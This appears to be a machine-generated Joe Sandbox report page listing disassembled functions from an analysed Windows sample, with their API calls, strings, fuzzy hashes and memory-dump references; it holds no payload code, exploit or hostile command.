Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f21d738ecd02c20c6e0bada44877d6ebb0d40dae4f07e95fb0f6389d033d7871
Instruction ID: 412650e5e5f0c6b267693e29760f73b06665dcab885f62160e507fced0d155b0
Opcode Fuzzy Hash: f21d738ecd02c20c6e0bada44877d6ebb0d40dae4f07e95fb0f6389d033d7871
Instruction Fuzzy Hash: C0217F74908209ABDB20DFA8D855F9AB7A8BF44720F204A1EFDA0D72D0DB709C508B52

Uniqueness

Uniqueness Score: -1.00%

Function 009C710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009C712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C715D
GetStdHandle.KERNEL32(000000F6), ref: 009C716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009C71A8

Strings

nul, xrefs: 009C71A3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b0c9405e4533fdeb500127438cfc1ac0a7a54a64bc767b1e47425f2dfc09c8e6
Instruction ID: a7aa9ef4dbc97ff6af0972c613679e6e56276b72a40ccbc7dfff0badea7a1b41
Opcode Fuzzy Hash: b0c9405e4533fdeb500127438cfc1ac0a7a54a64bc767b1e47425f2dfc09c8e6
Instruction Fuzzy Hash: 7621717590C209ABDB209FA89C44FAAB7ACAF55720F240A1DFDB1D72D0D77098418F62

Uniqueness

Uniqueness Score: -1.00%

Function 009CAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009CAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009CAF13
__swprintf.LIBCMT ref: 009CAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,009EF910), ref: 009CAF6A

Strings

%lu, xrefs: 009CAF26

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 7a52de3c52ccef50cf244b6ca8cb3fa79091fef87ea55702a1a9d8fdeb85affa
Instruction ID: 9150209f26f861db2a655c084d04a18136c6deadf28997b6ea86833a5f1e6b53
Opcode Fuzzy Hash: 7a52de3c52ccef50cf244b6ca8cb3fa79091fef87ea55702a1a9d8fdeb85affa
Instruction Fuzzy Hash: AB214130A0014DAFCB10EF65C995EEE7BB8EF89704B104069F909EB251DB31EE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Part of subcall function 009BA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BA399
Part of subcall function 009BA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BA3AC
Part of subcall function 009BA37C: GetCurrentThreadId.KERNEL32 ref: 009BA3B3
Part of subcall function 009BA37C: AttachThreadInput.USER32(00000000), ref: 009BA3BA

GetFocus.USER32 ref: 009BA554

Part of subcall function 009BA3C5: GetParent.USER32(?), ref: 009BA3D3

GetClassNameW.USER32(?,?,00000100), ref: 009BA59D
EnumChildWindows.USER32(?,009BA615), ref: 009BA5C5
__swprintf.LIBCMT ref: 009BA5DF

Strings

%s%d, xrefs: 009BA5D9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: c84ebbeb65d94fc3f5ebed4e9fe58f9f039cf241b06f169dc3afc2356e93f327
Instruction ID: 951a2d7ddb1119d5573c38696379418b4319820d7c1e8fd258bc9f00f8e99f81
Opcode Fuzzy Hash: c84ebbeb65d94fc3f5ebed4e9fe58f9f039cf241b06f169dc3afc2356e93f327
Instruction Fuzzy Hash: 1B11B471600208BBDF117F60DD85FEA77BCAF88714F044075BA18AA192DA705D459B75

Uniqueness

Uniqueness Score: -1.00%

Function 009C2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009C2048

Strings

APPEND, xrefs: 009C2081
EXISTS, xrefs: 009C2070
REMOVE, xrefs: 009C204E
KEYS, xrefs: 009C205F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 7e66078bf90c8f5c230b6dad3238f53e62805fd491b0beab1f72f732e0a8d7cb
Instruction ID: a5cc561d2f965703babccdf03196c79fc9b0bcb2e93be4eff0a4689653a9a160
Opcode Fuzzy Hash: 7e66078bf90c8f5c230b6dad3238f53e62805fd491b0beab1f72f732e0a8d7cb
Instruction Fuzzy Hash: 4A118E30904109DFCF00EFA4C950AFEB3B4FF65304B108569D8556B391DB32690ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 009DEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009DEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009DEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009DF07E
CloseHandle.KERNEL32(?), ref: 009DF0FF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a55f8b723ecbd5c70f40686eb07e0d595c532e2821619e38c8bebf2755f5b9ce
Instruction ID: eb9527f6c5d7df21b6b8997195587217595c1c22a6c5d3fcea64b8e3413baf77
Opcode Fuzzy Hash: a55f8b723ecbd5c70f40686eb07e0d595c532e2821619e38c8bebf2755f5b9ce
Instruction Fuzzy Hash: 788176716443009FD720EF28C996F2AB7E9AF88710F14C91EF596DB392DB71AC408B51

Uniqueness

Uniqueness Score: -1.00%

Function 009E02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E0038,?,?), ref: 009E10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009E040E
RegCloseKey.ADVAPI32(?,?), ref: 009E043A
RegCloseKey.ADVAPI32(00000000), ref: 009E0447

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: d91bc43ef68ce57a2164fd7cb476f1ab7b7655f404b1f4af09c044a24c2ba02b
Instruction ID: 18b53f807cdd76c596e5be43659f741787bcd8693bbd620ad8953867da9cd5c8
Opcode Fuzzy Hash: d91bc43ef68ce57a2164fd7cb476f1ab7b7655f404b1f4af09c044a24c2ba02b
Instruction Fuzzy Hash: DB514931208244AFD705EF65C891F6AB7E8FF88314F04892EB595872A2EB74ED44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009DDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009DDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 009DDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 009DDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 009DDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009DDD35

Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009C7B20,?,?,00000000), ref: 00965B8C
Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009C7B20,?,?,00000000,?,?), ref: 00965BB0

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 051421e2441a8124224d522a391ea6c1db52068f425efe1c05847dcdab7be17e
Instruction ID: 7b1a995fd5bba5f1a360cc548b1d44fe498ab18eea351e579d0f5c0bb23b560b
Opcode Fuzzy Hash: 051421e2441a8124224d522a391ea6c1db52068f425efe1c05847dcdab7be17e
Instruction Fuzzy Hash: CC514835A40609DFCB00EFA8C494DADB7F9FF89310B05C06AE859AB361DB34AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009CE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009CE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009CE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009CE8F2

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009CE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009CE91F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: a12250ad3a7552f0ac022eeaac1935d863fbf7b58e1d0fc1c51e728b2daff568
Instruction ID: bf717295b5add2c4a5ab94c9019821a4f4442c1c4ac831145fed5ad9dfed489b
Opcode Fuzzy Hash: a12250ad3a7552f0ac022eeaac1935d863fbf7b58e1d0fc1c51e728b2daff568
Instruction Fuzzy Hash: 99510C35A00205DFCF01EF64C991AAEBBF9EF48310B188099E94AAB361CB35ED51DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009EA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 029c99264fa3e4d266fc73cb334293bdcf71cf8934a7e41c0f94a0dfead6b649
Instruction ID: 56c2e90b9e0076d5b1b80bffb46fb48bebcdc6044cb361608cff2e0e12a11b26
Opcode Fuzzy Hash: 029c99264fa3e4d266fc73cb334293bdcf71cf8934a7e41c0f94a0dfead6b649
Instruction Fuzzy Hash: 58412635904284AFC722DF29CC88FB9BBA9FB09310F144165F855A72F1D770BE41DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00962344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00962357
ScreenToClient.USER32(00A267B0,?), ref: 00962374
GetAsyncKeyState.USER32(00000001), ref: 00962399
GetAsyncKeyState.USER32(00000002), ref: 009623A7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ff231e783beaebe98eb747ed19c951d12984097979e5dc367c33a9bcfaab50ae
Instruction ID: f511e987810b10cef3cbaa1b848df03af19a25ff6c723d3fa4841f97541b7bdf
Opcode Fuzzy Hash: ff231e783beaebe98eb747ed19c951d12984097979e5dc367c33a9bcfaab50ae
Instruction Fuzzy Hash: B0419D71508259FBDF159F68CC44EEDBB78FB45760F20436AF82896290C734AD50DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009B6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B695D
TranslateAcceleratorW.USER32(?,?,?), ref: 009B69A9
TranslateMessage.USER32(?), ref: 009B69D2
DispatchMessageW.USER32(?), ref: 009B69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B69EB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 97b5398091dd2540cf7010b3c02963b0800bf46fd7fb8108c05284df93cef6fb
Instruction ID: d7199a2a08799bd3eeb73974e70eb1eb3646331c3e6ae01b3006b7d67102dcc3
Opcode Fuzzy Hash: 97b5398091dd2540cf7010b3c02963b0800bf46fd7fb8108c05284df93cef6fb
Instruction Fuzzy Hash: 1B31C331905246ABDB30CFB89D84BF67BACAB05724F14457AE421D60A1D738A886DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009B8F12
PostMessageW.USER32(?,00000201,00000001), ref: 009B8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009B8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 009B8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009B8FDA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 8e44972ac7b36786ab7c7e52c0d64629eed2049f97c6f3a4c6f8e747cddc5b07
Instruction ID: c82df59075cd06f315c79b25c997c7e24db63caf50ff47249ba1d3ad3bde406f
Opcode Fuzzy Hash: 8e44972ac7b36786ab7c7e52c0d64629eed2049f97c6f3a4c6f8e747cddc5b07
Instruction Fuzzy Hash: CF31BF71504219EBDF14CF68DA8CAEE7BBAEB49325F104229F925AA1D0C7B09D14DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009BB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009BB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009BB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009BB742
_wcsstr.LIBCMT ref: 009BB74C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a44d519f0322adac69fa8715a1bcea846612fe8349baf1784e5e3d2f4aa8dc17
Instruction ID: 351e4fb3fb9a2d0523681d67f5d9ac4c850e1e9e8d499997da39cfa5a2508d2a
Opcode Fuzzy Hash: a44d519f0322adac69fa8715a1bcea846612fe8349baf1784e5e3d2f4aa8dc17
Instruction Fuzzy Hash: 1521C532204244BBEB255B799D89EBB7B9CDF85B30F10406AF905CA2A1EFA5DC419760

Uniqueness

Uniqueness Score: -1.00%

Function 009EB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

GetWindowLongW.USER32(?,000000F0), ref: 009EB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 009EB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009EB489
GetSystemMetrics.USER32(00000004), ref: 009EB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009D1184,00000000), ref: 009EB4D0

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: d6f54c191a6a650fd89c325c4c4a0f0491219594697e310a9401b198502534d2
Instruction ID: 639f0d1243ff2c3d136f2a1ecf8f386ceb28dd27b5c663bc0c1312f404442e6e
Opcode Fuzzy Hash: d6f54c191a6a650fd89c325c4c4a0f0491219594697e310a9401b198502534d2
Instruction Fuzzy Hash: 5E2180715142A5AFCB218F7ADC48B6A37A8EB05720B104B39F926D61F1F7309D11DB80

Uniqueness

Uniqueness Score: -1.00%

Function 009B97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009B9802

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009B9834
__itow.LIBCMT ref: 009B984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009B9874
__itow.LIBCMT ref: 009B9885

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: e2aa9130390c6c6852dbe4c8e24d9af00e1ae3bf4a60e08948ee382e64c4f93a
Instruction ID: e9a81589395d4e6709c53e571d89d82630e514b2ac95bd3c209929c3f870d902
Opcode Fuzzy Hash: e2aa9130390c6c6852dbe4c8e24d9af00e1ae3bf4a60e08948ee382e64c4f93a
Instruction Fuzzy Hash: 16210A31B10248BBDB11AAA18D86FEE7BACEF8A724F044025FE05DB291D671CD459791

Uniqueness

Uniqueness Score: -1.00%

Function 009612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0096134D
SelectObject.GDI32(?,00000000), ref: 0096135C
BeginPath.GDI32(?), ref: 00961373
SelectObject.GDI32(?,00000000), ref: 0096139C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

